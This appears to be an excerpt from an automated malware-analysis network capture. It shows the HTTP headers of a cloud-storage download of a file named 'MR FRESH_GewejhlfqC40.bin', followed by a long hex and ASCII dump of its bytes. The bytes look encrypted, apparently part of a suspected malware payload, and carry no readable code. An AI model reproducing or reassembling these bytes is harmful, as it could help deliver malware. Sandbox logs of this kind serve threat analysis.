                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                                        Access-Control-Allow-Methods: GET,OPTIONS
                                                        Content-Type: application/octet-stream
                                                        Content-Disposition: attachment;filename="MR FRESH_GewejhlfqC40.bin";filename*=UTF-8''MR%20FRESH_GewejhlfqC40.bin
                                                        Content-Length: 221760
                                                        Date: Wed, 13 Oct 2021 12:39:36 GMT
                                                        Expires: Wed, 13 Oct 2021 12:39:36 GMT
                                                        Cache-Control: private, max-age=0
                                                        X-Goog-Hash: crc32c=d6qnCg==
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                        Connection: close
                                                        2021-10-13 12:39:36 UTC5INData Raw: df 9f c5 00 29 39 9d 4d 06 d5 33 af b6 8f 72 d2 8b 14 4c 0b 75 9b ee 38 89 d4 48 a9 16 1e ff 66 b4 c7 ba 2f 2a 2c 11 ab 10 8a 52 eb a0 d4 62 5b 4c f9 4c 7b cd 79 1f de a4 82 f4 cc ad 96 27 27 f0 49 3e 16 2e 5e 75 3e 5d 81 82 fe 88 90 52 89 85 7b fb 83 12 b2 cb 4c 7d a4 6b b8 0a 51 b5 08 7e 5e c7 79 00 ac 3b 41 cb 9d bd ab b2 9e 5b 77 5c fa 7c 3d d3 39 cd dd 2c 77 2b 2a 3d 6c 82 fb 65 8d 79 23 a1 48 54 52 d4 38 b7 fc 24 70 67 8c d3 9e df a2 4e 19 61 0a 83 93 2e ef b2 ce 4b e4 21 10 9f 68 7e dd 3d 6a 3d 5c 81 ba 02 cd de 02 13 a0 8f 0f f2 30 d7 d7 f2 f5 b7 2b 7c 17 db 34 a5 5c 36 de 41 40 98 14 05 62 cc c5 9b ca d3 bb 03 3b 39 ed 7c 54 91 0c 36 53 82 ea 87 f6 a5 32 e6 b8 0b a9 15 52 33 f8 b4 ff 86 70 19 ab ec 63 2f c9 fc 24 c2 47 e6 cd 67 8c b6 9e fb d4 53
                                                        Data Ascii: )9M3rLu8Hf/*,Rb[LL{y''I>.^u>]R{L}kQ~^y;A[w\|=9,w+*=ley#HTR8$pgNa.K!h~=j=\0+|4\6A@b;9|T6S2R3pc/$GgS
                                                        2021-10-13 12:39:36 UTC9INData Raw: f8 42 c7 cc e7 80 ca ec 4a 6c 58 bb 68 bf d6 21 4d 87 f8 80 68 21 d7 c9 3f e8 a4 e1 35 d8 44 01 78 ec a3 ad c1 9f 91 18 11 48 a2 48 6a aa cb 31 85 8f 02 bf 3e 97 5b ea 4b f1 5c c0 e7 33 9f a5 8e ab d6 d3 06 db 38 68 2c 8a 52 80 05 3f a6 a2 d7 5a 85 81 ef 6e b2 3f ec 20 13 95 4e 22 f2 48 79 79 72 8f 42 fa 2a c5 94 bd 49 e8 e6 71 a7 be 7a 97 f5 c9 ab a7 d1 c6 f2 09 f8 6b 87 e1 9f e7 5f a3 88 8a 40 e6 69 36 52 35 b2 16 bf d6 17 02 0f 83 03 6a 07 5e 45 df f1 d0 4a a6 f3 a9 98 9e 98 ed ad ce 25 bb 58 da c9 07 fb fe 27 78 20 f8 56 14 16 23 d9 63 11 1a 4f 91 9a a9 83 ee e2 e1 d2 42 ae 16 27 58 1a 6c 59 81 88 f5 70 1b 68 89 3d 7a 94 d0 12 b2 c1 64 73 a6 6b be 1c 79 9b 08 7e 54 d1 39 8b ac 3b 41 cc f2 e9 ab b2 94 57 70 33 a2 7c 3d d9 8e da 0b a1 5c 2b 2a bc 61 81
                                                        Data Ascii: BJlXh!Mh!?5DxHHj1>[K\38h,R?Zn? N"HyyrB*Iqzk_@i6R5j^EJ%X'x V#cOB'XlYph=zdsky~T9;AWp3|=\+*a
                                                        2021-10-13 12:39:36 UTC13INData Raw: c2 ec 31 14 42 44 9a b0 21 43 c4 bb cf 3f dc c4 e1 09 70 87 07 5f e1 d6 fd 48 a3 23 ae 62 d0 73 cf ff 7f ed 3e 47 21 2f 20 3f b3 89 ce de 40 04 f0 77 2e 0d 3c 2a e8 b8 87 36 01 cf 1d 5d 5c 90 39 72 5e 40 c5 98 3e 5c 65 6e c3 eb 99 6c ca 0b 9f 0e a7 ca c9 9c a7 74 88 90 6c 52 35 e6 28 06 97 c4 1d 68 4a 8a dc 5c 43 c2 81 ff d1 8e af 8f a0 87 a5 ee eb 11 a4 b8 d6 f4 2f 15 29 88 64 a7 c1 29 aa 9a e1 22 da ec 4b 7d 4c b5 a9 9c 21 0c 67 80 9e c8 78 39 f5 35 e1 e2 aa 6f 2c c4 38 52 78 fd ad 6e fe 4f 92 34 0d 45 54 2c 40 9d cd 4f 93 a7 2c b9 40 89 51 c2 77 d9 dd ca 39 39 92 90 96 b8 d2 d2 3f df 2e 94 2d df 51 81 99 3b ac b3 d3 45 9d 7d ee 1b b0 56 72 18 f1 68 b1 dd f5 36 60 79 72 26 c7 de 38 df 9e 97 5b c3 d4 74 af a8 7b 97 fd dc ab b6 d6 cf f1 5b f8 6c 9a 6b ad
                                                        Data Ascii: 1BD!C?p_H#bs>G!/ ?@w.<*6]\9r^@>\enltlR5(hJ\C/)d)"K}L!gx95o,8RxnO4ET,@O,@Qw99?.-Q;E}Vrh6`yr&8[t{[lk
                                                        2021-10-13 12:39:36 UTC16INData Raw: 60 68 12 49 58 6a 3f 62 4a 4b 16 22 a6 40 d4 2f 33 80 e9 6c b8 b7 5c b6 41 81 1f c0 89 65 af 3f 7e 4c 76 87 78 5b e7 75 c9 93 24 23 5d 42 11 60 1b 9f b9 7a c3 c0 68 2f fa af 18 6d bf 65 46 e2 8d 58 10 c6 bb 2c 49 c4 d9 77 46 c9 dc 56 e4 7b 47 53 ae ff ee ea 9a e9 07 5f 9f 3c 2b 81 c3 ee 90 d8 c5 57 39 2a 48 ca e9 a6 f2 5b a4 60 2f 19 68 ad cb 67 6e 3f 5b 1e 78 59 94 33 a2 c9 70 46 12 9d 09 3c 75 40 a3 69 32 5c ec 9c d8 2c d2 1a f0 1c 66 51 cd 73 ed d9 89 fc bb 23 a4 b8 7d 49 ee db 7b ed 25 50 19 f9 19 13 b8 9c 02 53 44 0c d8 82 23 14 29 41 22 a9 83 23 d4 3e 39 59 67 99 27 06 55 61 ed a4 9c 43 63 a3 c7 fa 80 40 1a 1f 61 09 e4 0d c0 83 bc d4 9f b5 44 61 97 f9 37 06 b1 ec 34 6c 55 89 fc 5d 7e c6 a0 3f f9 fc ab e0 6c 25 ba ee 26 1a 81 81 e5 ed d1 1e 16 a0 45
                                                        Data Ascii: `hIXj?bJK"@/3l\Ae?~Lvx[u$#]B`zh/meFX,IwFV{GS_<+W9*H[`/hgn?[xY3pF<u@i2\,fQs#}I{%PSD#)A"#>9Yg'UaCc@aDa74lU]~?l%&E
                                                        2021-10-13 12:39:36 UTC18INData Raw: 15 54 22 fe 24 91 85 70 1d a3 cb 63 2f c3 93 f5 c2 47 ac eb 76 ab 9e 4e f9 d6 55 8e 7c bd 7b 47 b4 5e c9 8e c0 ea 71 5a 2d 9d 95 fc 09 13 dc 07 ff f6 96 0e 3c 52 f1 5c 61 ed 0f 66 e1 e9 79 25 d2 34 0b e7 33 84 3e 0f c5 dc ab 77 e8 83 25 2b a7 cd a0 c5 42 fc 07 8a 1e d7 29 e1 09 c6 02 9f c3 53 90 2f 34 97 1f d7 28 bb d5 59 62 bf e5 9d 42 46 eb 98 b2 dc 5b d5 ee b3 12 cf 1c cc 71 7c 5a ec d6 c7 b9 73 08 b7 7d 4c 00 b7 ee e7 18 4b f3 bc 79 c9 6d 01 c1 96 53 75 46 84 87 40 03 a4 cf 77 46 e7 be 59 6a 39 28 a8 7c 16 28 72 5c cc 13 17 87 c1 5e ab ac 7e 53 64 80 15 1e f7 7a a7 17 94 54 36 1d 17 91 e7 6e 4e 58 2b 06 74 66 51 71 51 9a 8d 83 f9 c0 6e 87 35 ef 1e 1b 80 a6 46 e6 a3 72 d8 c6 bd 0e ce c9 fc 59 1e b4 dc 5c fd c4 7e 2b b6 d7 be 36 9a fe ad 66 3e 25 03 f9
                                                        Data Ascii: T"$pc/GvNU|{G^qZ-<R\afy%43>w%+B)S/4(YbBF[q|Zs}LKymSuF@wFYj9(|(r\^~SdzT6nNX+tfQqQn5FrY\~+6f>%
                                                        2021-10-13 12:39:36 UTC19INData Raw: ef dc ab a6 c0 c4 da 40 32 63 8d 95 a2 e7 5f a2 5a 84 68 ac 65 36 58 5a e3 16 bf dd 11 15 60 cf e7 62 0d 58 6b ff bf d0 b8 c1 be a9 97 94 9e fa d8 80 25 ba 52 dc d6 35 95 b8 27 78 24 fe 7e 58 1b 2a df 0c 4e 1a 4f 9b 86 81 ce ed e2 e7 bd 13 b0 1f 2d 5e 7b 3e 59 81 ae f7 77 6f 5d 89 3d 7b e1 83 12 b3 cb 4c 3d a4 50 b1 0a 51 bb 08 7e 5e 8e 70 00 ac 34 41 cb 9d a7 ab b2 9f 5b 77 5c fa 24 34 d3 39 c3 dd 2c 77 4d 23 bd 6c 8d fb 6b 92 d9 2d a1 fd 5d 9f f5 80 c3 b9 e9 51 3d e4 ba ed 7c db 3c 76 09 78 e2 fe 14 8c d3 a1 25 8b 55 30 6f 04 5e af 46 04 1d 35 4f 93 46 82 82 22 7e cf f1 6a dc 3c da dd d6 f5 18 22 7c 17 d5 34 f5 19 8b d7 0d 41 94 14 8a cc b0 a4 9b cb d3 bb 03 3b f5 e4 9c 54 9d 0d 3d 52 53 e3 87 ae a9 32 e6 b0 11 a9 15 53 33 f8 5a 89 6c 79 19 8b e2 63 2f
                                                        Data Ascii: @2c_Zhe6XZ`bXk%R5'x$~X*NO-^{>Ywo]={L=PQ~^p4A[w\$49,wM#lk-]Q=|<vx%U0o^F5OF"~j<"|4A;T=RS2S3Zlyc/
                                                        2021-10-13 12:39:36 UTC20INData Raw: c4 92 2c 05 54 4b 9b 1f 21 43 c4 a4 df 37 26 c5 dc 05 46 57 04 73 eb f5 fa 3d bb 24 b9 98 73 40 c4 f4 70 ed 28 5b c7 d0 0d 15 bb 80 ee 0d 4c 0f f0 71 3f ea 2e 02 e5 ab ec e4 0a 31 16 72 60 b3 25 26 5b 4b c5 9b 86 bd 68 51 cc e9 e7 a5 d5 1f 6b 19 b8 24 db 88 b6 0d 89 6e 6d 7a 91 fa 2b 3b 22 de 07 6c 52 9e dc 5c 43 c5 8a f5 fa 93 5e 8f a6 2f 90 fa f3 15 a3 bf 2c ec fd 16 12 88 6d b6 f7 b8 a9 b6 e5 ab c5 c7 30 82 a2 4e b0 a5 df 0d 58 be 95 d7 f4 21 dd 15 c6 e2 ac dc 25 c3 2f 6e fb ec a9 71 e9 a0 97 04 e9 43 50 4e 45 f2 b9 31 8f ad 2e d2 ca 91 51 c8 4a 9e 5c ca 39 2e 8a 8b 8e ba d2 cf d0 da 14 6f 3b d9 4c 85 8e 3f bd a6 ce a4 84 af ea 21 be 67 64 24 19 84 4a 39 0c 49 55 7e 7b 2a 75 f1 24 cc 90 bd 59 f7 c1 8a a6 85 78 8f e6 d8 ab b6 c4 de 24 41 d4 6e a6 a7 b7
                                                        Data Ascii: ,TK!C7&FWs=$s@p([Lq?.1r`%&[KhQk$nmz+;"lR\C^/,m0NX!%/nqCPNE1.QJ\9.o;L?!gd$J9IU~{*u$Yx$An
                                                        2021-10-13 12:39:36 UTC22INData Raw: 1e ff f2 30 7e e0 5e f1 5e 58 39 fe 42 e5 d4 65 a8 cd 27 37 ce 00 9b 35 09 1b d4 a7 c8 c1 7a 31 55 a5 f7 c9 3f c3 1b d9 84 08 f9 d7 f6 06 cc 2f 5a b3 0d 9c 2f 36 54 07 2e 46 41 c2 27 60 d0 28 99 3c 54 f2 a6 db f5 7f d5 90 b7 92 c7 18 db 46 5e 78 22 d4 cf a7 a5 23 9b 6f 62 2c 9f ee e1 71 5b f5 d3 a5 a6 6f 0a e9 b8 59 6c 40 90 99 71 cf a5 e3 62 66 12 60 5a 6a 3f 25 65 49 16 2e 17 32 f1 07 0e 8a f3 6a ab a4 68 70 40 ad 06 18 a1 b2 a5 17 96 64 9c 83 17 97 88 08 c3 4d 21 0c 68 79 11 68 0e 9d 5b 53 d7 ce 6f 0d a4 af 09 6f 17 ae 46 e2 8f 28 c8 ca bb 2e 8d 35 fd 73 62 cf f4 ba f5 66 69 43 49 fd e4 32 f5 85 0f 77 74 36 30 8b ac 2c 86 26 ce a5 34 18 6c fd e1 b9 ea b6 bb 64 15 32 6d 9f 66 99 80 c8 59 e4 78 59 89 6c 6c c9 bb 4c cc 92 06 14 42 51 a1 4b 22 42 c4 ae b7
                                                        Data Ascii: 0~^^X9Be'75z1U?/Z/6T.FA'`(<TF^x"#ob,q[oYl@qbf`Zj?%eI.2jhp@dM!hyh[SooF(.5sbfiCI2wt60,&4ld2mfYxYllLBQK"B
                                                        2021-10-13 12:39:36 UTC23INData Raw: d6 c0 98 28 bb 5b c4 28 34 b8 bf 31 06 0f fe 7e 5c 9a 94 c8 d6 4d 11 56 96 9c 88 d7 12 e3 cb b9 38 b4 0c 20 5e 7c 28 a7 80 ae fc 60 62 52 80 21 85 fa af 10 99 c9 67 aa a3 7c 6e 01 56 bd 39 e8 48 ed 79 00 bf 0b 42 cb 34 bd ab b2 b0 5b 77 4d ec 6f 39 eb ab cd dd 2c 77 3a 2e a7 92 83 d7 63 aa 4d 2d a1 fc 46 8c f1 80 a7 b4 f0 af 32 c8 b5 fb 81 f7 3c 76 02 f6 55 e9 d4 81 df ba 36 8f 55 21 f9 15 a0 ae 64 17 63 17 ef 9a 42 aa 8e 23 7e c5 84 18 dc 3d d0 d7 cf e6 b3 2b 6d 13 c0 ca f4 35 2d d8 62 4a 9a 14 80 b2 8f a4 9b ce db 21 15 13 17 ed 9c 5e 85 f3 3c 7e bc f6 94 aa a6 23 e2 ac f5 a8 39 57 24 d2 47 9a 81 70 08 8f fb 9d 2e e5 ff 3c d1 43 a6 dc 63 ba 48 9f d7 d5 44 95 06 a5 6a 43 ad 88 ef a2 c2 cb 1b b3 44 62 60 25 10 03 74 12 f7 ff a3 ca fb 78 f1 56 47 28 30 47
                                                        Data Ascii: ([(41~\MV8 ^|(`bR!g|nV9HyB4[wMo9,w:.cM-F2<vU6U!dcB#~=+m5-bJ!^<~#9W$Gp.<CcHDjCDb`%txVG(0G
                                                        2021-10-13 12:39:36 UTC24INData Raw: 2c d4 76 23 1e af 26 e8 a9 87 f4 69 32 1c 71 52 86 53 3f 5f 3e cd 9c 9c 47 41 74 c4 eb 8e 40 f1 1f 61 05 0b cf c0 83 b2 d7 d5 93 6c 56 95 e6 48 26 8a ba 04 6c 55 87 0a 57 6c ce 8e cb dd fc ad 85 26 2d ba e4 fc c8 83 aa d2 ed d3 0b 73 b0 74 cf e1 46 a8 9e cf 8b c3 ff 49 55 79 b1 b6 85 5f 05 4b 8e 93 0a 61 22 dd 15 e3 fd db fe 2a ae 23 56 78 e8 81 7d ea b1 95 30 33 42 7c 50 c2 95 cb 31 8b 7a c7 bf 3e 91 53 dd 0b c2 45 b4 31 33 99 8b a6 a6 d5 d2 28 f3 1c 6a 2c f9 d2 9e 8a 3f a8 7f 1a 58 85 83 ed 28 cb 4e 6e 5e 11 95 4e 26 da 46 7a 79 74 0a cb fa 38 d5 14 b5 48 f3 d2 a9 08 ab 7b 97 f7 c3 d1 94 d9 ba d2 40 f8 6f a5 9a af e7 59 8a a6 8c 68 a6 e9 3e 58 5a fd cb 2e de 11 15 62 d0 78 59 14 26 6d ff bf d4 62 d9 bd a9 9e bc ba fa c2 8a a5 b3 52 dc d2 e8 e7 b3 27 78
                                                        Data Ascii: ,v#&i2qRS?_>GAt@alVH&lUWl&-stFIUy_Ka"*#Vx}03B|P1z>SE13(j,?X(Nn^N&Fzyt8H{@oYh>XZ.bxY&mbR'x
                                                        2021-10-13 12:39:36 UTC25INData Raw: 1b 97 b7 04 81 34 21 7d f0 d1 6b 64 ed c3 69 d0 28 82 75 5f e9 a6 ce c6 46 2b 91 91 1f cd 09 d0 6a 56 73 2e de d4 b6 45 31 ac 7d 5b 33 80 f8 19 1f 76 fa d1 be c2 45 1c e8 b2 59 66 5e 8f 86 7b 2a a4 de 6a 7f 04 7a 59 46 35 0e d0 4d 79 30 79 4f fb 18 3b 93 f2 66 ba b7 6b 81 bf 80 39 14 98 7f b9 c1 83 47 69 91 04 8a e7 64 d8 52 39 f8 74 59 1f 62 00 87 8d 45 fa c0 62 36 28 b0 1a 76 8c a6 57 f9 91 c9 db ea b2 37 9c d1 2a 4c 7a d2 cf 47 f7 77 74 74 9c 01 e5 18 91 e9 04 66 78 ea 38 8c b3 17 83 c3 cf 98 2d 10 53 03 e8 8a e8 59 bf 60 44 19 68 a1 2c c6 81 c8 8c fb 4c 4a 89 5c 79 d2 6c b2 cd be 25 05 49 5a 75 70 2a 5e d7 bf d8 3d c3 db d9 f3 6f 55 0d 62 e6 ce f3 e0 a8 28 b1 4c 61 77 c6 fd 60 f2 34 bd 38 fd 2b 02 b3 8c 0a 40 5e 1b ec 65 38 14 3e 35 f7 82 7d 28 26 3b
                                                        Data Ascii: 4!}kdi(u_F+jVs.E1}[3vEYf^{*jzYF5My0yO;fk9GidR9tYbEb6(vW7*LzGwttfx8-SY`Dh,LJ\yl%IZup*^=oUb(Law`48+@^e8>5}(&;
                                                        2021-10-13 12:39:36 UTC27INData Raw: 2a 7a fb 89 01 bb da 43 27 72 78 b7 08 40 ba 20 68 5f c7 73 13 aa 2a 4e d1 4b ae a4 9a 87 5a 77 56 f8 6d 32 c2 3f a2 c7 2d 77 21 39 b5 7d 8d ea 6d 44 d0 22 a3 ed 52 b7 e3 81 b6 ba e3 40 3c fe 6c fe f0 d0 2d 79 2e 6e e3 fe 04 87 c2 af 3f 5d 46 3f ff 1c 51 87 5e 05 1d 3f fc 8b 57 8d 97 f4 6d c0 fa 7b cb e7 cd 0b 5b de b7 2b 7d 04 cb 36 e4 16 27 ce 1b 50 8a 3c 96 cd aa ae 8a c5 c2 aa d5 28 36 ef 8d 5b bb 1b 3c 52 83 f9 89 bf a9 28 f7 be dd 7f 06 5d 31 e9 55 a1 93 71 19 81 e0 72 20 d3 2a 37 cd 45 b7 c2 4f ba b7 9e f1 db 42 89 18 73 68 48 b2 67 e1 a6 d6 e1 1e 81 3e 90 8e d5 02 05 af c8 29 e5 9d 63 fc 5d d9 40 46 33 0a 50 cc cf 76 3f 0e 34 38 de 0e 93 e4 12 cd 51 92 36 c0 57 36 2f af e6 c6 2a b9 15 c8 81 24 8a d6 f7 0c c5 13 88 c3 24 91 2f 34 72 22 d1 47 6d dd
                                                        Data Ascii: *zC'rx@ h_s*NKZwVm2?-w!9}mD"R@<l-y.n?]F?Q^?Wm{[+}6'P<(6[<R(]1Uqr *7EOBshHg>)c]@F3Pv?48Q6W6/*$$/4r"Gm
                                                        2021-10-13 12:39:36 UTC28INData Raw: 3d 1d 84 3a 0d 40 57 9b 2e 5d 67 d6 76 e2 d5 f8 b5 85 bf 29 ba ec ee eb a5 85 d0 fa dd 14 0d 9a 93 b0 c5 44 83 98 cc 58 c2 fd c1 ca 4f b1 9e d6 df 0d 4d a4 8c e7 61 21 a8 14 e1 e2 9b cd 33 c1 28 7e 4c ed a9 7b fe 3c d2 18 17 43 6f 50 53 97 dd 4f ba a6 2c b7 a3 80 5b ad 45 f0 5c c0 2a 37 b1 96 8f ab dc d0 41 46 38 6a 26 e0 57 be 93 3e ac a8 c6 5e ea 1e ef 37 b8 6e 71 31 1f 81 66 a1 f0 48 7f 6f ff 25 ef fa 39 cb 80 a9 60 5b d6 74 ad b1 f7 a8 f5 dc aa 8f f7 c5 da 4a ef e7 b2 95 ac e6 77 13 82 8c 62 84 33 36 58 50 ee c0 32 f7 11 15 61 dc 04 7b 0b 4c 4d e5 bc d0 4c d1 33 ae 98 94 9f e9 c9 91 2e ad 43 db 74 24 9f a6 31 f4 15 fe 7e 59 b6 32 d4 1f 4d 0b 43 8f 88 99 43 c3 e2 e7 bc 00 a3 07 20 48 62 a2 48 8c 95 e8 eb 7e 5f 9e 15 d7 fb 83 18 94 da 41 2b 34 47 a7 1b
                                                        Data Ascii: =:@W.]gv)DXOMa!3(~L{<CoPSO,[E\*7AF8j&W>^7nq1fHo%9`[tJwb36XP2a{LML3.Ct$1~Y2MCC HbH~_A+4G
                                                        2021-10-13 12:39:36 UTC29INData Raw: f9 36 4f f5 d3 a5 e1 34 09 e9 b4 7b 5b 4e 90 97 07 4c a4 cf 7b 73 1a 95 47 7b 19 62 9d 4a 16 22 54 43 f6 16 02 91 fe 09 95 ad 74 84 9f 9b 12 14 54 79 a6 17 90 4b 7c 5c 11 90 e7 75 d2 58 07 01 64 60 7e 37 11 8c af 8e c3 20 68 25 24 a7 29 66 f1 a6 46 a2 5a 37 da c6 b2 06 9e 4b fc 5f 31 0f dc 5c f7 15 45 6a ae f5 f7 16 84 75 24 77 7e 3d 38 a4 b3 3c 1d f3 cf 89 37 1c 44 ec ec b9 e0 59 99 5e 09 31 74 a6 15 6d 6e 32 65 f5 5c 4f 8d 44 40 d5 71 4c c6 83 0e 05 66 2f 88 62 21 49 d5 86 c9 0f b7 e8 f1 0d 64 68 24 64 82 f2 e7 36 b1 32 8c 7f 1d 42 c7 ec 71 fc 0d 2c 16 d0 21 19 a9 92 ca 42 51 8a 47 19 13 15 2f 24 fb 8c 9c 69 87 1a 1c 71 51 8a 06 1d 63 5f ed 8d bd 55 76 3d ef f7 89 68 df 6c 48 0e 8b cd d3 a5 a7 2c 81 b1 03 70 96 f9 37 06 b4 d5 2b 44 40 82 22 57 47 97 8a
                                                        Data Ascii: 6O4{[NL{sG{bJ"TCtTyK|\uXd`~7 h%$)fFZ7K_1\Eju$w~=8<7DY^1tmn2e\OD@qLf/b!Idh$d62Bq,!BQG/$iqQc_Uv=hlH,p7+D@"WG
                                                        2021-10-13 12:39:36 UTC31INData Raw: f2 78 9d c3 3c ae e5 a3 9e d9 8a b4 98 aa 50 33 ee b1 f7 ec dd 3c 67 09 67 f9 00 0f a0 f8 a2 0d bf 54 30 f7 04 76 0e 48 04 17 24 e9 98 6e c6 8c 22 74 cd c3 2e dd 3d d0 cc de dd 1e 2b 7c 1d a8 40 f4 19 30 d4 12 5d 88 1b 8a dd a5 bb 90 34 d2 97 0e 24 29 60 b7 54 93 0c 2e 5b 96 e6 94 a1 a6 23 e9 af 1f 57 14 7e 3e e9 56 9f 15 49 07 76 13 9c 30 dc ef 2b c2 56 a9 d2 7e 52 b7 b2 d7 c7 5e 92 2a 26 79 47 b6 61 63 89 c0 e0 1f 98 23 8c 91 cc 09 1e b8 84 d7 e7 92 61 e7 f0 e0 58 53 27 17 55 e1 73 79 25 d2 38 2d dc 04 84 2f 0a 04 d6 47 37 ec 5b 37 2d bc f0 e1 25 bc 03 d3 9b 07 85 d8 f7 17 c9 18 7a ad 28 9c 30 2e c6 25 d0 47 6c c6 5e 73 c3 27 9d 53 43 ee 58 de f1 57 c4 9c ab 82 f6 09 24 bd be 6f 3d db c7 ae 54 3d af 83 4b 04 92 ff eb 04 ca cd e2 52 36 92 14 f0 a1 5c 75
                                                        Data Ascii: x<P3<ggT0vH$n"t.=+|@0]4$)`T.[#W~>VIv0+V~R^*&yGac#aXS'Usy%8-/G7[7-%z(0.%Gl^s'SCXW$o=T=KR6\u
                                                        2021-10-13 12:39:36 UTC32INData Raw: 8f df 8d 61 9d a7 d3 68 86 dd 15 e1 a0 ac cd 22 c6 26 6e 05 ec a9 71 e9 b8 88 e6 16 6e 71 58 47 d7 5a 2e 85 e7 58 bd 3e 91 4d cf 73 f8 42 34 38 1f 9c 98 a4 b4 df df 2e d2 2f 94 2d df 50 8e 87 3f a5 ba 29 5b a9 87 f9 3c ab 70 77 29 03 6b 4f 0e f6 63 20 62 7f 22 e6 e3 c6 de b8 b4 4d f0 d2 63 7d a5 2f 8d f8 dc a2 bb 3e c5 f6 45 ff 47 a4 88 a1 e7 56 bf 7c 8d 44 a4 6c 33 12 4d 2f 42 a1 d1 11 1c 76 31 02 46 0f 4f 68 ff b6 cf 43 37 bf 85 9a bf 9b c2 bc 7f da 44 45 d7 fd 3f 96 b4 6d e9 35 f3 50 5a 02 28 da 29 0b 0d 99 cf 99 cb c6 d2 8b 18 42 ec b8 3c 2d 4d 45 3c 59 bc 82 fe 77 2c 52 89 2c 6d f7 a8 3d b2 c3 5b c3 a5 47 ba 12 5d b5 00 66 a0 c6 55 0d d2 0c 41 cb 99 ce e5 b3 9e 51 7c 45 f6 7c 35 c5 c7 cc f1 2e 60 27 2a b5 75 7c fa 47 90 e8 2f 8a 33 5a 9d 9a cf b7 b0
                                                        Data Ascii: ah"&nqnqXGZ.X>MsB48./-P?)[<pw)kOc b"Mc}/>EGV|Dl3M/Bv1FOhC7DE?m5PZ()B<-ME<Yw,R,m=[G]fUAQ|E|5.`'*u|G/3Z
                                                        2021-10-13 12:39:36 UTC33INData Raw: 0d b9 71 a7 aa 90 4c 76 c6 17 91 f6 76 d4 14 6e 02 75 75 11 62 11 8c a5 19 fb c0 68 31 24 af 09 67 97 a6 46 c9 c2 33 f2 91 ba 26 9d a4 a4 5e 71 c3 d6 5a 79 d1 64 40 ec d7 78 34 9a f2 0b 18 e3 3c 2b 8d bf 20 87 c9 cb 07 81 d9 6b fa fe 7c ef 9e 37 63 17 19 69 ad 13 71 6e 33 fd 53 cc c5 83 58 7e cf 67 5d c8 1c 9b 3c 5e 41 a3 69 0a 48 ec 8a da 2c de b7 a9 0c 6e 73 7c 6f ea 09 f1 ec ac f5 23 4d 72 6c c7 e1 72 fb 34 df 30 c6 23 a7 24 9f c5 50 e1 98 f6 60 2a 0e 28 06 f4 a8 83 23 03 38 92 c6 48 43 22 60 65 40 c5 9c 9c 43 69 0d 87 b0 a0 fe d5 1f 6b bb 17 ce c9 0d 01 1d 4a 95 4c 56 96 f9 3d 48 27 58 05 46 55 83 22 4e 5f cb 88 6a f9 fc ad c7 a6 25 ab cc 64 15 a4 a3 d0 82 4c 14 05 89 60 b8 67 f1 88 65 e7 80 c0 ce 44 55 7f b2 b6 89 ac 57 4a 8e 9d ad 40 bd dd 15 eb e1
                                                        Data Ascii: qLvvnuubh1$gF3&^qZyd@x4<+ k|7ciqn3SX~g]<^AiH,ns|o#Mrlr40#$P`*(#8HC"`e@CikJLV=H'XFU"N_j%dL`geDUWJ@
